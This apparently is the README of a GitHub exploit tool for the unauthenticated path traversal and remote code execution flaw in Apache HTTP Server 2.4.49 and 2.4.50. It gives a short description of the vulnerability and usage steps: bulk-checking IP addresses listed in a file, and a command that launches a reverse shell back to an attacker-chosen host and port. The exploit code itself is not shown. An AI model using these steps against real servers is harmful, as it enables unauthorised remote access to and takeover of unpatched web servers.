Skip to content

Latest commit

 

History

History
20 lines (14 loc) · 1.05 KB

File metadata and controls

20 lines (14 loc) · 1.05 KB

LFI-RCE-Unauthenticated-Apache-2.4.49-2.4.50

LFI / RCE Unauthenticated - Apache 2.4.49 & 2.4.50

Explanation:

Apache HTTP Server is an open source web server from the Apache Foundation in the United States. The server is fast, reliable, and extensible via a simple API. It was discovered that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 is insufficient. An attacker could use a path traversal attack to map URLs to files outside of directories configured by alias-like directives. These requests may succeed if the files outside of these directories are not protected by the usual default configuration of "request all rejects". If CGI scripts are also enabled for these alias paths, this may allow remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50, and not earlier versions.

Usage:

Put the IP address you want to check into the ip.txt file
Run python3 check.py

# FOR REVERSE SHELL
python script.py --lhost 192.168.0.100 --lport 1234

Affected software:

Apache 2.4.49

Apache 2.4.50